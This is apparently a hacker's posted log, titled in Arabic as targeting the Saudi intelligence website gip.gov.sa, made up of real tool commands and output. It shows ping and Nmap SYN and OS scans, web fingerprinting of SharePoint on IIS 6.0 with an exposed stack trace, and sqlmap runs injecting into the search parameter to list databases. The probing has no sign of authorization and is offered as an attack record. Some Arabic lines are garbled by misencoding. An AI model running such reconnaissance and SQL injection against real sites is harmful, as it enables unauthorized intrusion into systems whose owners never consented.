by JM511gip.gov.sa استهداف الاستخبارات

1. استهداف موقع الاستخبارات السعودية
2. 10-02-2012
3. BY JM511
4. From : Saudi Arabia
5. -------------------------------
6.  
7. www.gip.gov.sa
8. http://gip.gov.sa/~index.aspx
9.  
10.  
11. root@bt:~# fping -v gip.gov.sa
12. fping: Version 2.4b2_to_ipv6 $Date: 2002/01/16 00:33:42 $
13. fping: comments to [email protected]
14. root@bt:~# fping -s gip.gov.sa
15. gip.gov.sa is unreachable
16.  
17. 1 targets
18. 0 alive
19. 1 unreachable
20. 0 unknown addresses
21.  
22. 4 timeouts (waiting for response)
23. 4 ICMP Echos sent
24. 0 ICMP Echo Replies received
25. 0 other ICMP received
26.  
27. 0.00 ms (min round trip time)
28. 0.00 ms (avg round trip time)
29. 0.00 ms (max round trip time)
30. 4.086 sec (elapsed real time)
31.  
32.  
33. ====================
34. root@bt:/pentest/database/sqlmap# python sqlmap.py -u http://gip.gov.sa
35.  
36. sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
37. http://sqlmap.sourceforge.net
38.  
39. [!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.
40.  
41. [*] starting at: 23:12:01
42.  
43. [23:12:01] [INFO] using '/pentest/database/sqlmap/output/gip.gov.sa/session' as session file
44. [23:12:22] [INFO] testing connection to the target url
45. [23:12:43] [INFO] heuristics detected web page charset 'ascii'
46. sqlmap got a 302 redirect to 'http://gip.gov.sa/Pages/Home.aspx'. do you want to follow redirects from now on (or stay on the original page)? [Y/n] y
47. [23:13:00] [INFO] testing if the url is stable, wait a few seconds
48. [23:13:03] [WARNING] url is not stable, sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison' and provide a string or regular expression to match on
49. how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] s
50. [23:14:43] [INFO] finding static words in longest matching part of dynamic page content
51. [23:14:43] [INFO] static words: '1432', '1433', '2011', 'English', 'Sign'
52. please enter value for parameter 'string': 9
53.  
54. ====================
55.  
56.  
57. Server Error in '/' Application.
58. The file or folder name contains characters that are not permitted. Please use a different name.
59. Description: An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.
60.  
61. Exception Details: System.Runtime.InteropServices.COMException: The file or folder name contains characters that are not permitted. Please use a different name.
62.  
63. Source Error:
64.  
65. An unhandled exception was generated during the execution of the current web request. Information regarding the origin and location of the exception can be identified using the exception stack trace below.
66.  
67. Stack Trace:
68.  
69. [COMException (0x81020073): The file or folder name contains characters that are not permitted. Please use a different name.]
70. Microsoft.SharePoint.Library.SPRequestInternalClass.GetFileAndMetaInfo(String bstrUrl, Byte bPageView, Byte bPageMode, Byte bGetBuildDependencySet, String bstrCurrentFolderUrl, Boolean& pbCanCustomizePages, Boolean& pbCanPersonalizeWebParts, Boolean& pbCanAddDeleteWebParts, Boolean& pbGhostedDocument, Boolean& pbDefaultToPersonal, String& pbstrSiteRoot, Guid& pgSiteId, UInt32& pdwVersion, String& pbstrTimeLastModified, String& pbstrContent, Byte& pVerGhostedSetupPath, UInt32& pdwPartCount, Object& pvarMetaData, Object& pvarMultipleMeetingDoclibRootFolders, String& pbstrRedirectUrl, Boolean& pbObjectIsList, Guid& pgListId, UInt32& pdwItemId, Int64& pllListFlags, Boolean& pbAccessDenied, Guid& pgDocId, Byte& piLevel, UInt64& ppermMask, Object& pvarBuildDependencySet, UInt32& pdwNumBuildDependencies, Object& pvarBuildDependencies, String& pbstrFolderUrl, String& pbstrContentTypeOrder) +0
71. Microsoft.SharePoint.Library.SPRequest.GetFileAndMetaInfo(String bstrUrl, Byte bPageView, Byte bPageMode, Byte bGetBuildDependencySet, String bstrCurrentFolderUrl, Boolean& pbCanCustomizePages, Boolean& pbCanPersonalizeWebParts, Boolean& pbCanAddDeleteWebParts, Boolean& pbGhostedDocument, Boolean& pbDefaultToPersonal, String& pbstrSiteRoot, Guid& pgSiteId, UInt32& pdwVersion, String& pbstrTimeLastModified, String& pbstrContent, Byte& pVerGhostedSetupPath, UInt32& pdwPartCount, Object& pvarMetaData, Object& pvarMultipleMeetingDoclibRootFolders, String& pbstrRedirectUrl, Boolean& pbObjectIsList, Guid& pgListId, UInt32& pdwItemId, Int64& pllListFlags, Boolean& pbAccessDenied, Guid& pgDocId, Byte& piLevel, UInt64& ppermMask, Object& pvarBuildDependencySet, UInt32& pdwNumBuildDependencies, Object& pvarBuildDependencies, String& pbstrFolderUrl, String& pbstrContentTypeOrder) +219
72.  
73. [SPException: The file or folder name contains characters that are not permitted. Please use a different name.]
74. Microsoft.SharePoint.Library.SPRequest.GetFileAndMetaInfo(String bstrUrl, Byte bPageView, Byte bPageMode, Byte bGetBuildDependencySet, String bstrCurrentFolderUrl, Boolean& pbCanCustomizePages, Boolean& pbCanPersonalizeWebParts, Boolean& pbCanAddDeleteWebParts, Boolean& pbGhostedDocument, Boolean& pbDefaultToPersonal, String& pbstrSiteRoot, Guid& pgSiteId, UInt32& pdwVersion, String& pbstrTimeLastModified, String& pbstrContent, Byte& pVerGhostedSetupPath, UInt32& pdwPartCount, Object& pvarMetaData, Object& pvarMultipleMeetingDoclibRootFolders, String& pbstrRedirectUrl, Boolean& pbObjectIsList, Guid& pgListId, UInt32& pdwItemId, Int64& pllListFlags, Boolean& pbAccessDenied, Guid& pgDocId, Byte& piLevel, UInt64& ppermMask, Object& pvarBuildDependencySet, UInt32& pdwNumBuildDependencies, Object& pvarBuildDependencies, String& pbstrFolderUrl, String& pbstrContentTypeOrder) +267
75. Microsoft.SharePoint.SPWeb.GetWebPartPageContent(Uri pageUrl, PageView requestedView, HttpContext context, Boolean forRender, Boolean includeHidden, Boolean mainFileRequest, Boolean fetchDependencyInformation, Boolean& ghostedPage, Byte& verGhostedPage, String& siteRoot, Guid& siteId, Int64& bytes, Guid& docId, UInt32& docVersion, String& timeLastModified, Byte& level, Object& buildDependencySetData, UInt32& dependencyCount, Object& buildDependencies, SPWebPartCollectionInitialState& initialState, Object& oMultipleMeetingDoclibRootFolders, String& redirectUrl, Boolean& ObjectIsList, Guid& listId) +1980
76. Microsoft.SharePoint.ApplicationRuntime.SPRequestModuleData.FetchWebPartPageInformationForInit(HttpContext context, SPWeb spweb, Boolean mainFileRequest, String path, Boolean impersonate, Boolean& fGhostedPage, Byte& verGhostedPage, Guid& docId, UInt32& docVersion, String& timeLastModified, SPFileLevel& spLevel, String& masterPageUrl, String& customMasterPageUrl, String& webUrl, String& siteUrl, Guid& siteId, Object& buildDependencySetData, SPWebPartCollectionInitialState& initialState, String& siteRoot, String& redirectUrl, Object& oMultipleMeetingDoclibRootFolders, Boolean& objectIsList, Guid& listId, Int64& bytes) +718
77. Microsoft.SharePoint.ApplicationRuntime.SPRequestModuleData.GetFileForRequest(HttpContext context, SPWeb web, Boolean exclusion, String virtualPath) +232
78. Microsoft.SharePoint.ApplicationRuntime.SPRequestModule.InitContextWeb(HttpContext context, SPWeb web) +104
79. Microsoft.SharePoint.WebControls.SPControl.SPWebEnsureSPControl(HttpContext context) +428
80. Microsoft.SharePoint.WebControls.SPControl.GetContextWeb(HttpContext context) +31
81. Microsoft.SharePoint.ApplicationRuntime.SPRequestModule.PostResolveRequestCacheHandler(Object oSender, EventArgs ea) +385
82. System.Web.SyncEventExecutionStep.System.Web.HttpApplication.IExecutionStep.Execute() +68
83. System.Web.HttpApplication.ExecuteStep(IExecutionStep step, Boolean& completedSynchronously) +75
84.  
85.  
86. Version Information: Microsoft .NET Framework Version:2.0.50727.3082; ASP.NET Version:2.0.50727.3614
87.  
88. ==================================================
89.  
90.  
91. http://www.gip.gov.sa/ [302]
92. http://www.gip.gov.sa [302] Microsoft-Sharepoint[12.0.0.6421], IP[213.184.179.218], Country[SAUDI ARABIA][SA], UncommonHeaders[microsoftsharepointteamservices], X-Powered-By[ASP.NET], RedirectLocation[http://www.gip.gov.sa/Pages/Home.aspx], ASP.NET, HTTPServer[Microsoft-IIS/6.0], Microsoft-IIS[6.0], Title[Document Moved]
93. URL : http://www.gip.gov.sa
94. Status : 302
95. ASP.NET --------------------------------------------------------------------
96. Description: ASP.NET is a free web framework that enables great Web
97. applications. Used by millions of developers, it runs some
98. of the biggest sites in the world. - homepage:
99. http://www.asp.net/
100.  
101. Country --------------------------------------------------------------------
102. Description: GeoIP IP2Country lookup. To refresh DB, replace
103. IpToCountry.csv and remove country-ips.dat. GeoIP database
104. from http://software77.net/geo-ip/. Local IPv4 addresses
105. are represented as ZZ according to an ISO convention.
106. Lookup code developed by Matthias Wachter for rubyquiz.com
107. and used with permission.
108. String : SAUDI ARABIA
109. Module : SA
110.  
111. HTTPServer -----------------------------------------------------------------
112. Description: HTTP server header string. This plugin also attempts to
113. identify the operating system from the server header.
114. String : Microsoft-IIS/6.0 (from server string)
115.  
116. IP -------------------------------------------------------------------------
117. Description: IP address of the target, if available.
118. String : 213.184.179.218
119.  
120. Microsoft-IIS --------------------------------------------------------------
121. Description: Microsoft Internet Information Services (IIS) for Windows
122. Server is a flexible, secure and easy-to-manage Web server
123. for hosting anything on the Web. From media streaming to
124. web application hosting, IIS's scalable and open
125. architecture is ready to handle the most demanding tasks. -
126. homepage: http://www.iis.net/
127. Version : 6.0
128.  
129. Microsoft-Sharepoint -------------------------------------------------------
130. Description: Microsoft SharePoint 2010 makes it easier for people to
131. work together. Using SharePoint 2010, your people can set
132. up Web sites to share information with others, manage
133. documents from start to finish, and publish reports to help
134. everyone make better decisions. - homepage:
135. http://sharepoint.microsoft.com/
136. Version : 12.0.0.6421
137.  
138. RedirectLocation -----------------------------------------------------------
139. Description: HTTP Server string location. used with http-status 301 and
140. 302
141. String : http://www.gip.gov.sa/Pages/Home.aspx (from location)
142.  
143. Title ----------------------------------------------------------------------
144. Description: The HTML page title
145. String : Document Moved (from page title)
146.  
147. UncommonHeaders ------------------------------------------------------------
148. Description: Uncommon HTTP server headers. The blacklist includes all
149. the standard headers and many non standard but common ones.
150. Interesting but fairly common headers should have their own
151. plugins, eg. x-powered-by, server and x-aspnet-version.
152. Info about headers can be found at www.http-stats.com
153. String : microsoftsharepointteamservices (from headers)
154.  
155. X-Powered-By ---------------------------------------------------------------
156. Description: X-Powered-By HTTP header
157. String : ASP.NET (from x-powered-by string)
158.  
159. http://www.gip.gov.sa/Pages/Home.aspx [200]
160. http://www.gip.gov.sa/Pages/Home.aspx [200] Microsoft-Sharepoint[12.0.0.6421], IP[213.184.179.218], Country[SAUDI ARABIA][SA], UncommonHeaders[microsoftsharepointteamservices], JQuery, ActiveX, X-Powered-By[ASP.NET], MetaGenerator[Microsoft SharePoint], ASP.NET[2.0.50727], Adobe-Flash, HTTPServer[Microsoft-IIS/6.0], Microsoft-IIS[6.0], Title[%0D%0A%09%0D%0A%09%D8%A7%D9%84%D8%B5%D9%81%D8%AD%D8%A9 %D8%A7%D9%84%D8%B1%D8%A6%D9%8A%D8%B3%D9%8A%D8%A9%0D%0A%09%D8%B1%D8%A6%D8%A7%D8%B3%D8%A9 %D8%A7%D9%84%D8%A7%D8%B3%D8%AA%D8%AE%D8%A8%D8%A7%D8%B1%D8%A7%D8%AA %D8%A7%D9%84%D8%B9%D8%A7%D9%85%D8%A9%0D%0A%0D%0A]
161. URL : http://www.gip.gov.sa/Pages/Home.aspx
162. Status : 200
163. ASP.NET --------------------------------------------------------------------
164. Description: ASP.NET is a free web framework that enables great Web
165. applications. Used by millions of developers, it runs some
166. of the biggest sites in the world. - homepage:
167. http://www.asp.net/
168. Version : 2.0.50727
169.  
170. ActiveX --------------------------------------------------------------------
171. Description: ActiveX is a framework based on Microsoft's Component
172. Object Model (COM) and Object Linking and Embedding (OLE)
173. technologies. ActiveX components officially operate only
174. with Microsoft's Internet Explorer web browser and the
175. Microsoft Windows operating system. - More info:
176. http://en.wikipedia.org/wiki/ActiveX
177.  
178. Adobe-Flash ----------------------------------------------------------------
179. Description: This plugin identifies instances of embedded adobe flash
180. files.
181.  
182. Country --------------------------------------------------------------------
183. Description: GeoIP IP2Country lookup. To refresh DB, replace
184. IpToCountry.csv and remove country-ips.dat. GeoIP database
185. from http://software77.net/geo-ip/. Local IPv4 addresses
186. are represented as ZZ according to an ISO convention.
187. Lookup code developed by Matthias Wachter for rubyquiz.com
188. and used with permission.
189. String : SAUDI ARABIA
190. Module : SA
191.  
192. HTTPServer -----------------------------------------------------------------
193. Description: HTTP server header string. This plugin also attempts to
194. identify the operating system from the server header.
195. String : Microsoft-IIS/6.0 (from server string)
196.  
197. IP -------------------------------------------------------------------------
198. Description: IP address of the target, if available.
199. String : 213.184.179.218
200.  
201. JQuery ---------------------------------------------------------------------
202. Description: Javascript library
203.  
204. MetaGenerator --------------------------------------------------------------
205. Description: This plugin identifies meta generator tags and extracts its
206. value.
207. String : Microsoft SharePoint
208.  
209. Microsoft-IIS --------------------------------------------------------------
210. Description: Microsoft Internet Information Services (IIS) for Windows
211. Server is a flexible, secure and easy-to-manage Web server
212. for hosting anything on the Web. From media streaming to
213. web application hosting, IIS's scalable and open
214. architecture is ready to handle the most demanding tasks. -
215. homepage: http://www.iis.net/
216. Version : 6.0
217.  
218. Microsoft-Sharepoint -------------------------------------------------------
219. Description: Microsoft SharePoint 2010 makes it easier for people to
220. work together. Using SharePoint 2010, your people can set
221. up Web sites to share information with others, manage
222. documents from start to finish, and publish reports to help
223. everyone make better decisions. - homepage:
224. http://sharepoint.microsoft.com/
225. Version : 12.0.0.6421
226.  
227. Title ----------------------------------------------------------------------
228. Description: The HTML page title
229. String :
230.  
231. الصفحة الرئيسية
232. رئاسة الاستخبارات العامة
233. ==============
234. --------------------------------------
235. ==========================
236.  
237.  
238.  
239.  
240.  
241. root@bt:/pentest/database/sqlmap# python sqlmap.py -u http://gip.gov.sa/Search/results.aspx?k=%27 --dbs
242.  
243. sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
244. http://sqlmap.sourceforge.net
245.  
246. [!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.
247.  
248. [*] starting at: 23:02:01
249.  
250. [23:02:01] [INFO] using '/pentest/database/sqlmap/output/gip.gov.sa/session' as session file
251. [23:02:22] [INFO] testing connection to the target url
252. [23:02:58] [INFO] testing if the url is stable, wait a few seconds
253. [23:03:00] [WARNING] url is not stable, sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison' and provide a string or regular expression to match on
254. how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] c
255. [23:03:09] [INFO] testing if GET parameter 'k' is dynamic
256. [23:03:11] [INFO] confirming that GET parameter 'k' is dynamic
257. [23:03:12] [INFO] GET parameter 'k' is dynamic
258. [23:03:12] [WARNING] heuristic test shows that GET parameter 'k' might not be injectable
259. [23:03:12] [INFO] testing sql injection on GET parameter 'k'
260. [23:03:12] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
261. [23:03:20] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
262. [23:03:24] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
263. [23:03:27] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
264. [23:03:28] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
265. [23:03:29] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
266. [23:03:30] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
267. [23:03:32] [CRITICAL] unable to connect to the target url or proxy
268. [23:03:32] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
269. [23:03:33] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
270. [23:03:34] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
271. [23:03:36] [CRITICAL] unable to connect to the target url or proxy
272. [23:03:36] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
273. [23:03:37] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
274. [23:03:38] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
275. [23:03:40] [CRITICAL] unable to connect to the target url or proxy
276. [23:03:40] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
277. [23:03:41] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
278. [23:03:42] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
279. [23:03:44] [CRITICAL] unable to connect to the target url or proxy
280. [23:03:44] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
281. [23:03:47] [INFO] testing 'MySQL > 5.0.11 stacked queries'
282. [23:03:51] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
283. [23:03:55] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
284. [23:03:55] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
285. [23:03:55] [WARNING] most probably web server instance hasn't recovered yet from previous timed based payload. if the problem persists please wait for few minutes and rerun without flag T in --technique option (e.g. --flush-session --technique=BEUS) or try to lower the --time-sec value (e.g. --time-sec=2)
286. [23:03:56] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
287. [23:03:57] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
288. [23:03:59] [CRITICAL] unable to connect to the target url or proxy
289. [23:03:59] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
290. [23:04:00] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
291. [23:04:01] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
292. [23:04:03] [CRITICAL] unable to connect to the target url or proxy
293. [23:04:03] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
294. [23:04:04] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
295. [23:04:05] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
296. [23:04:07] [CRITICAL] unable to connect to the target url or proxy
297. [23:04:07] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
298. [23:04:08] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
299. [23:04:09] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
300. [23:04:11] [CRITICAL] unable to connect to the target url or proxy
301. [23:04:11] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
302. [23:04:14] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
303. [23:04:18] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
304.  
305.  
306. -======================================
307.  
308.  
309.  
310. Starting Nmap 5.10BETA1 ( http://nmap.org ) at 2010-07-25 22:57
311. الاستخبارات السعودية
312. Nmap scan report for www.gip.gov.sa (213.184.179.218)
313. Host is up (0.048s latency).
314.  
315. TRACEROUTE (using port 80/tcp)
316. HOP RTT ADDRESS
317. 1 31.00 ms speedtouch.lan (192.168.1.254)
318. 2 94.00 ms 84-235-124-9.saudi.net.sa (84.235.124.9)
319. 3 78.00 ms 84-235-124-81.saudi.net.sa (84.235.124.81)
320. 4 187.00 ms 212.118.152.225
321. 5 78.00 ms 192.168.102.45
322. 6 62.00 ms 192.168.102.2
323. 7 62.00 ms 212.118.152.89
324. 8 47.00 ms 212.118.152.90
325. 9 47.00 ms 212.93.211.2
326. 10 31.00 ms ddn5.awalnet.net.sa (212.93.204.122)
327. 11 63.00 ms 213.184.179.218
328.  
329. Nmap done: 1 IP address (1 host up) scanned in 0.89 seconds
330. ===================
331.  
332.  
333.  
334. windows server 2003 sp1
335.  
336.  
337. 213.184.179.218
338.  
339. Open Ports : 2
340.  
341. 80 http
342.  
343. 443 https
344. ===================
345.  
346.  
347.  
348. ÌÇÑí ÇÎÊÑÇÞ ãæÞÚ ÇáÇÓÊÎÈÇÑÇÊ ÇáÓÚæÏíÉ
349. 1\ÔÚÈÇä\1431åÜ
350. www.gip.gov.sa
351.  
352. ãÚáæãÇÊ ÓíÑÝÑåã :
353.  
354. Starting Nmap 5.10BETA1 ( http://nmap.org ) at 2010-07-25 22:45 ÇáÓÚæÏíÉ - ÇáÊæÞíÊ ÇáÑÓãí
355. NSE: Loaded 35 scripts for scanning.
356. Initiating Ping Scan at 22:45
357. Scanning www.gip.gov.sa (213.184.179.218) [8 ports]
358. Completed Ping Scan at 22:45, 0.31s elapsed (1 total hosts)
359. Initiating Parallel DNS resolution of 1 host. at 22:45
360. Completed Parallel DNS resolution of 1 host. at 22:45, 0.17s elapsed
361. Initiating SYN Stealth Scan at 22:45
362. Scanning www.gip.gov.sa (213.184.179.218) [1000 ports]
363. Discovered open port 443/tcp on 213.184.179.218
364. Discovered open port 80/tcp on 213.184.179.218
365. Completed SYN Stealth Scan at 22:45, 17.45s elapsed (1000 total ports)
366. Initiating Service scan at 22:45
367. Scanning 2 services on www.gip.gov.sa (213.184.179.218)
368. Completed Service scan at 22:46, 17.80s elapsed (2 services on 1 host)
369. Initiating OS detection (try #1) against www.gip.gov.sa (213.184.179.218)
370. Initiating Traceroute at 22:46
371. Completed Traceroute at 22:46, 1.06s elapsed
372. Initiating Parallel DNS resolution of 11 hosts. at 22:46
373. Completed Parallel DNS resolution of 11 hosts. at 22:46, 0.25s elapsed
374. NSE: Script scanning 213.184.179.218.
375. NSE: Starting runlevel 1 scan
376. Initiating NSE at 22:46
377. Completed NSE at 22:46, 3.22s elapsed
378. NSE: Script Scanning completed.
379. Nmap scan report for www.gip.gov.sa (213.184.179.218)
380. Host is up (0.058s latency).
381. Not shown: 998 filtered ports
382. PORT STATE SERVICE VERSION
383. 80/tcp open http Microsoft IIS webserver 6.0
384. | html-title: \xD8\xA7\xD9\x84\xD8\xB5\xD9\x81\xD8\xAD\xD8\xA9 \xD8\xA7\xD9\x84\xD8\xB1\xD8\xA6\xD9\x8A\xD8\xB3\xD9\x8A\xD8\xA9\xD8\xB1\xD8\xA6\xD8\xA7\xD8\xB3\xD8\xA9 \xD8\xA7\xD9\x84\xD8\xA7\xD8\xB3\xD8\xAA\xD8\xAE\xD8\xA8\xD8\xA7\xD8\xB1\xD8\xA7\xD8\xAA...
385. |_ Requested resource was http://www.gip.gov.sa/Pages/Home.aspx
386. 443/tcp open ssl/http Microsoft IIS webserver 6.0
387. |_ sslv2: server still supports SSLv2
388. | html-title: Object moved
389. |_ Did not follow redirect to http://www.gip.gov.sa/
390. Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
391. Device type: general purpose
392. Running: Microsoft Windows 2003
393. OS details: Microsoft Windows Server 2003 SP1
394. Network Distance: 11 hops
395. TCP Sequence Prediction: Difficulty=262 (Good luck!)
396. IP ID Sequence Generation: Busy server or unknown class
397. Service Info: OS: Windows
398.  
399. TRACEROUTE (using port 80/tcp)
400. HOP RTT ADDRESS
401. 1 31.00 ms speedtouch.lan (192.168.1.254)
402. 2 78.00 ms 84-235-124-9.saudi.net.sa (84.235.124.9)
403. 3 78.00 ms 84-235-124-81.saudi.net.sa (84.235.124.81)
404. 4 78.00 ms 212.118.152.225
405. 5 46.00 ms 192.168.102.45
406. 6 62.00 ms 192.168.102.2
407. 7 62.00 ms 212.118.152.89
408. 8 62.00 ms 212.118.152.90
409. 9 47.00 ms 212.93.211.2
410. 10 31.00 ms ddn5.awalnet.net.sa (212.93.204.122)
411. 11 63.00 ms 213.184.179.218
412.  
413. Read data files from: C:\Program Files\Nmap
414. OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
415. Nmap done: 1 IP address (1 host up) scanned in 44.27 seconds
416. Raw packets sent: 3082 (138.192KB) | Rcvd: 65 (3398B)